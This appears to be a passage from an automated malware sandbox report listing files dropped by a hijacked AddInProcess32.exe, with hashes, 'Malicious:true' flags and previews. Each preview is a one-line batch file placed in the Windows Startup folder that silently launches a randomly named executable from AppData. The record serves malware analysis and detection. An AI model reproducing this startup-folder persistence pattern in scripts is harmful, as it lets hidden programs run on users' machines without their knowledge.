                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.748401682401873
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5rgN5+X08Jl:fE1sZ23CilJl
                                                                                                                                                                                                                                MD5:196C1542A25A0613A307AA642377E3BF
                                                                                                                                                                                                                                SHA1:49764B5AE243EB7BBE571918200612B97A267632
                                                                                                                                                                                                                                SHA-256:5D0E04E436BD989C9AE1F0992EF3EF0C3B3DB776ECC24DFC73CE5297F397B26F
                                                                                                                                                                                                                                SHA-512:539200CD8BFDC565694B264A3E1E9795DE408AE15D35F2F495E7DD81846194B04D22E076067DEA65C8A652CBC4FAB6745E64B23A2840EB08E03634D048A2AE5F
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\NwvsoZspGn6vizp2axhKoY0Z.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LlgTJb1fsKZaWWGOHpA0Z7jy.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.843467442344775
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J52Jt1hQcahQDyCHykdan:fE1sZ232jUcrDypD
                                                                                                                                                                                                                                MD5:032ED7DC0EB8BC8BA0C8218BE0D79964
                                                                                                                                                                                                                                SHA1:A662F657B104FE9B7ECCEEB1879731ED84D95B9B
                                                                                                                                                                                                                                SHA-256:C9C0E72EA19D3A60701F930C0BF69C541039B2336E5822E41581B2A808A86F32
                                                                                                                                                                                                                                SHA-512:0F3DDF884D2E3587CB8E8C91676EAB0045AB0A76DCEB44529C781DBDF5F772A1BFE7C65E9B080DA011630A706D85576872619570B2CD303066392D0A455B61B8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\SlHGsDZGgkpk7MxF0QDuypot.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LxHbHMNvefHp2Hvr6DcpzhYd.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.787721153738063
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5PAB2md1tgUln:fE1sZ23oneUl
                                                                                                                                                                                                                                MD5:811AA358597D43C04B870452F01A1B30
                                                                                                                                                                                                                                SHA1:4FEA92D85C882C07DF9D2652D0373EA436229DA5
                                                                                                                                                                                                                                SHA-256:E8410EA67C7C46A21A8AA7A0F108A552561F79D2C818EC723DEA3F006E010809
                                                                                                                                                                                                                                SHA-512:35C6D5843ADA72D915CA37110FCBC8784E56ED2633888D1DFD7EE24DC38AD904CFCC026B9868C764C72F3389C31C06F9360816DC5771380A60E8640FFDC00317
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\jTODdSkaulFxtvMU8WoUUyzs.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MLlWxWjkKRHHt42qJxZpv3D4.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.950693798634243
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5I1KhScdccCg2kAHF:fE1sZ23IYEc8JF
                                                                                                                                                                                                                                MD5:A7550B2D445A83B05221512A51354D97
                                                                                                                                                                                                                                SHA1:A1959113695A221C60FB06D8DAAD443ADD2E65B2
                                                                                                                                                                                                                                SHA-256:39CD877F0E2FDA3A769171B00262C5B728A9F838D689A717FA3B08E56409994F
                                                                                                                                                                                                                                SHA-512:27B0D54093AFF0B2761D223CE6D8639C38CEA2CBBBE428F3FD9C633652FF88D18E1A4AAA67149BD97106C2B617497DFD7161401E09C05F69A46FBD5045360651
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\mPkGObww76qlp1C09a4tgBES.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MeUXi1xZRfgTr34geRpmygtS.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.918104667105449
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J51rShQaXJIXc7LAdiF:fE1sZ23hSZXis7LAEF
                                                                                                                                                                                                                                MD5:26120E74BCDF08CB2728ED54A7E17086
                                                                                                                                                                                                                                SHA1:569B719B7AB535FD707475525C1466E6B62DD5DE
                                                                                                                                                                                                                                SHA-256:D443AC2934BF29EC31AD5570C504A0B6F0C94D1735A571CF4F11F9E28091B39E
                                                                                                                                                                                                                                SHA-512:7841C67D2155F64EB6D2A7E52B673C420860613D508635D8E3174DD67EE50900C37DA3D7229F907B60AC3FA34C4DBD2B4CD672DE74650C6D810082AF6BBDAF4E
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\PNqnjNHui8frV2dffCZrA05K.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MfQYCojjZujE183iHin4yvvN.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.818760421130473
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5cahIWLpK158EFn:fE1sZ23cv8uis
                                                                                                                                                                                                                                MD5:ABE0EFC68FFB07CA33462EF390AF0AF6
                                                                                                                                                                                                                                SHA1:4EAD20667EEAF63B67980C4741345C6E8B5EB6DA
                                                                                                                                                                                                                                SHA-256:7A8A3FD33CE1E55D949CA7DAE6E868509878E70CF1E7D794DF7281252CB0D9D7
                                                                                                                                                                                                                                SHA-512:1BA93EFD46F0AF8F363AC18B346986275542724A5C95B09B7A8C8A53F93D42CF92474520AE4A9371F7987DA861122C55A5D56BD835BB055E9B2C4A2DD0729419
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\ymBV9PkPmsW6KLoPxnFlPP0z.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N7bW39nU2llZKhOZXueEFrfF.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.824043435284099
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5BA8X/RKmCJCJFn:fE1sZ239X0mN
                                                                                                                                                                                                                                MD5:C1C1873E393FD8A1396EAD46240D0C1F
                                                                                                                                                                                                                                SHA1:0E2E2E3D988EB04EAE9ACAC3949E67F193939659
                                                                                                                                                                                                                                SHA-256:C58F058D7402417C6EE9291EB353965E77A5F95258511443C1D30D00881CA5D3
                                                                                                                                                                                                                                SHA-512:68DFB894FA2F04DEEE69D81AE662AFD39BD7036BF66CDC775059ABF6C01CD76E27D048B595BAE801EC665C657A525BC9B86B641CC21ED28FBA51389C1B616521
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\deCnBzZpp4FSC4HClFNfim7T.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QJOvieJeRHqxL1CkBVqLAHn4.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.789774913884095
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5k5qmqsLk0CHF:fE1sZ23k5qEk0Cl
                                                                                                                                                                                                                                MD5:5A02F3FDE970F3FEFF6301C3CE3FFA2F
                                                                                                                                                                                                                                SHA1:8BBF1EE29BEC697CB6EA3530019A9616F9B29C74
                                                                                                                                                                                                                                SHA-256:4B7CD8BA2E85E9B09C9B4018DD216764CD1CD2FBEAE05BBB613236D5872C620C
                                                                                                                                                                                                                                SHA-512:E95D96F37F0AA8968D75ED6178C028B312E3F65053709E32DEF1CC06C811DFC6E171E771B2729D1FCB916FABE5AC5EB6A4C53D6A4D8AEAAB791311F01B0D9D30
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\A7Npgp1C644Vm1weiCOIngpF.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RSzAVr1FmnmbHDkLIrabhsTB.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.958030572933904
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5z0iQp/Ujx4mn:fE1sZ23KVi4m
                                                                                                                                                                                                                                MD5:0412E80AC6860023054BB366402CE59E
                                                                                                                                                                                                                                SHA1:0BC6E18A31036BF3EAE7358D9FD71213EF4AB366
                                                                                                                                                                                                                                SHA-256:392210AC30E877B853E674788851442942FB0F98F579032AB41E19D149C757A2
                                                                                                                                                                                                                                SHA-512:4CEDB84833552E342F351A8274F2CC2927D93D041810552763A44248BE299A4C33E7A722A02CA8139C303A590DEA7EC4A09808CF7E90375801ACBE47FE16DDDB
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\VgRPuj2QfERyAHULRBeO1F20.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ra9dznGmjOHpZAiuMncAyjjm.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.916050906959415
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5RoxqtGKsKAs:fE1sZ23Vcs
                                                                                                                                                                                                                                MD5:239882AFEFC18F9B4F921471A81E1E74
                                                                                                                                                                                                                                SHA1:5C12791B39257FC74D0B7C04496487351357E8E8
                                                                                                                                                                                                                                SHA-256:B9F2BBA2E3F2472C010113F48A8BE8BB08F643E34651597CDBBAB91B73B483DD
                                                                                                                                                                                                                                SHA-512:2F4014319F0A938EA7507F198CAF6AB69B766D7AF80BB136D3F47965E6F39B51941DF7202D744028BEF09E2623438799E9004D0FD7DA996367CC9A543F45C1F9
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\tM9DijOJq3CQOn3hcO2NIvuX.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SobxUGvoTK5M02dimGqnbluB.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.876731435623226
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5SKiEuQs4BCln:fE1sZ23SKTBs
                                                                                                                                                                                                                                MD5:B841BD3C053DFAD2AB1859F1E1D49CBC
                                                                                                                                                                                                                                SHA1:EF0AEBC9F39595EFEC125BC284344534EBAEFF19
                                                                                                                                                                                                                                SHA-256:6203B3496B820EC828261F1DC2C817C30469F345FFB804E368C42305236537FC
                                                                                                                                                                                                                                SHA-512:78957F3EE767C5DE2A1C8E8746D921DCC972E3D0FBB0BEEC0A3CDBFADFB9E69328E7180F2EB3EE71C50109CD592A62389ED99265BAEA081174A2B94B88F26B4B
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\wDhpi03qlIbaSzF5WZoKo8eV.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TVAm1QI1IkUDwXuoaPmgOaGO.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.8781276143310395
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5H+sXRowkdan:fE1sZ23PRD
                                                                                                                                                                                                                                MD5:928304A0F485D6A62B9559471BB0DE06
                                                                                                                                                                                                                                SHA1:96784C366C1191783B4973B5B5A3FC3F104E0B36
                                                                                                                                                                                                                                SHA-256:A27D96138A11AFD516D34890912C7E13622A24C8BB1CD615619C9AD5C70E8907
                                                                                                                                                                                                                                SHA-512:C1B0ED8ED397B60BAA55F26FB8D05BFFD0BD38542A0A7BCF78CD3CBDF7124A20D400D0F63EC5AB80F09A1FAC49EFC521118907A9350F09200F1849B1BCF86775
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\bw9CU3SIyrt3JEs5ELMi3GM3.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UNhgzOtBFiyZVWZ3q4kFYqN6.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.865791037041147
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5fcy3pWHT1xjjZ:fE1sZ23NZATDjjZ
                                                                                                                                                                                                                                MD5:0B7BE702A5F1F2A0CDDD1F6FE5C58E50
                                                                                                                                                                                                                                SHA1:180962A6E9F89FBFA21438B094513559499F7F53
                                                                                                                                                                                                                                SHA-256:499272D968E4E4001500778B261584F50A34F1507C2E26D5BC1DAD85DF8BBAED
                                                                                                                                                                                                                                SHA-512:A173924CDA1B5D82DD83285F0796DF269D537B4CCF1D9AF7A6F4CA66CD7586D3918A5226EB5049F763D411BDC1EA31DF1E0519796AC0FABCAF2B7BA299DF11A0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\zfeRg1KL3b6mzyGkHfaolHvL.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UYav4djsSfeWrnxzOp8uz2JM.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.796879623966314
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5XZyyZDHNl:fE1sZ23JyyZb
                                                                                                                                                                                                                                MD5:4140190BE38497B275A848CDA4A44E68
                                                                                                                                                                                                                                SHA1:231F46CFD8E03DF6344C1B28336F6C5017450867
                                                                                                                                                                                                                                SHA-256:4E7E671706C746AB3811CE799B35C1CC92E4FC58719AB1BCA2626F3E628C16DE
                                                                                                                                                                                                                                SHA-512:899A2C35D61E9B182C3E9BA92B08D04113D3B78BBE26C3A0B22DB419216F47A5FE7E5725E153A6CD5C946F02DEB485BAD6AD5021BD2675CBB21EBA4C92F7A53A
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\rdJ9fWEopei9Jq2a4C4fmX3Z.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uh3nu45INFmWm7584kVwgFUO.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.947090174351825
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5A3e3UT7cOiF:fE1sZ23AYect
                                                                                                                                                                                                                                MD5:B0B118FCE24B51323DEE0FBD2E236672
                                                                                                                                                                                                                                SHA1:F590ECB42517F0E7DE166511CD22168DDB2E128C
                                                                                                                                                                                                                                SHA-256:C7F3CEEA279EAAB5663954682E6679426E53B12BB2272BB86BE280D1644252E8
                                                                                                                                                                                                                                SHA-512:991CDF07B9035CDA95DA70DB11C4A9A5DDEC66CC6A5F44AA33BDE73E5A1E5213F06F22EE902CB844D977E15F5F755E7871EC93D36D8E2966617FE19858FFBCA8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\eRAYqRRIfUj5yD0ovEh9HMd4.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UsRuWQ7xN6FZn5at6gRKTF3B.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.925209377187667
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5SOVr7elp6Adm:fE1sZ23SO17R4m
                                                                                                                                                                                                                                MD5:CB44F8B2986C55F4D939056A521135BB
                                                                                                                                                                                                                                SHA1:378D82B44DD2942218FA14CE281B4DDEE818559D
                                                                                                                                                                                                                                SHA-256:1BCC31960A0351DD3142BE12A619E9125AC4F4B2C53F558F8AEAFEDDC95345AE
                                                                                                                                                                                                                                SHA-512:0FEB80B51AE7670DD8F171F0D8ADCD97B79724633B41CB8092659A87C2737EAD82BD79A31C48DCA624DAA8810A4B3D94107815CBDC17B88EB578442DAA669CE4
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\wkp6W1E2mbyM9VriyJKcQkLy.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WRO1mDUXRTjz6psEJDnxyxnx.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.916050906959415
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5UiOZwyIcVLeln:fE1sZ23UiOqyhwl
                                                                                                                                                                                                                                MD5:B097CCD4841E23D3FC4BEE669FC9659F
                                                                                                                                                                                                                                SHA1:D8FEA7766D2B5ECECF4F16B7DE528CAC1648E08B
                                                                                                                                                                                                                                SHA-256:946EFA5836D3A2319C3C5E440D5BE760C891F089428002FAB6DE415DFF6045C7
                                                                                                                                                                                                                                SHA-512:8F501A3D185C14137177B316B9376D00D34AC4EDCDA67319D1855E867991789A3F2A94E8AA0BACA3386FB0DA5F2CFBDA3F57706EE84F0E5C501673A70362134B
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\qGkRm1tZi3ZgbNWlurynDnJq.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WubC0DiuPPNp4xftV5ZUsBRa.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.85436133113751
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5jYt1VqLNlIkdan:fE1sZ23UfvD
                                                                                                                                                                                                                                MD5:1D7FD7D26FB70A1D81E9A24F01B8BAE2
                                                                                                                                                                                                                                SHA1:AC22D8035BF2AA6763D9D40278E525D647A4B336
                                                                                                                                                                                                                                SHA-256:30548BFBA8E6D6CA059D992213BA4513A808C1E818126EA9B89F5E3D140B8168
                                                                                                                                                                                                                                SHA-512:AB6F42340521B7BAB577BF7ECC016DB760E9F94C79D9B82A6F668C3C8E9C09D77766A666C9568E5BEE60B1967F37C8655C0A4A2730EFE7D544E5C8A544038798
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\Fh7qhqxo9lqcq8fZJGpCZFiC.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X92VSFxhiRrhLMunkKi2h57u.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.936406642084778
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5NuJqDs0wTrPCSkdan:fE1sZ23ps0grhD
                                                                                                                                                                                                                                MD5:15DFB05C0A9138E3E574FE4EDA6E19A4
                                                                                                                                                                                                                                SHA1:49A13C100528FFE8DD50D7CD8BA79B4D9668CA88
                                                                                                                                                                                                                                SHA-256:F48A230D5CF6CCED6D447CAD20C2E6E4768BCD5B71505FF71A99DAB63050B771
                                                                                                                                                                                                                                SHA-512:422279EB2771959F48474DDCC831CEC36CC1288E7E3094233B2E7DCC4B99403C0E169BC32A890113012EA866D14FC93C9C62CE01FEB50229F62E0D53B7A59EE1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\hK1ls0Ofsd3l9PBQOnBvFrY4.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XlekvkCI3kM0b7NtTDTdRwQu.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.9379317041235735
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J52fLQXJitvdiF:fE1sZ232zQXstsF
                                                                                                                                                                                                                                MD5:7909E132F2890A5A5B5FA7DD3ED2FD58
                                                                                                                                                                                                                                SHA1:4994FBF68C2945E12C48E1ACB8B289AAE177F7BD
                                                                                                                                                                                                                                SHA-256:94E8419EA02CA5A409300EB5629FCA6E84099D7B8D31E421F219D5DD028C144E
                                                                                                                                                                                                                                SHA-512:C3247E78EC3EC17A40B50ADFCD3EAF0306586D68EF3137B750991BF30324B3F76DF1C48D3E0173F441F9272876FF7184DB08CC968906A02DC49C81AA66B4207C
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\SzeKmiZzCnF5yGTNutlHXxk9.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\YK212xIfnETeMj8HWzSaLpXm.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.782063769309611
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5RWAC21pCQ45tHF:fE1sZ231CgsP
                                                                                                                                                                                                                                MD5:18E97AA59265DD24AE7F60A3AB607D7E
                                                                                                                                                                                                                                SHA1:D6C9E378E1E6EB4F3A45BB73FDC0E374C645FE3C
                                                                                                                                                                                                                                SHA-256:1AA14148EBC18CB0F86C38E81DF3863D991839F66586791E22CB0D8E05BB8C21
                                                                                                                                                                                                                                SHA-512:0E03631015E77A45BD5274870D309013D6E9304C800035A82FE811452E067CEFE0338B9C98A5292725DE29ABA625F0D555C1B735931300156649B4A2DA59BB8A
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\tse6OoEOj17quPLpMuzuQXuv.exe"

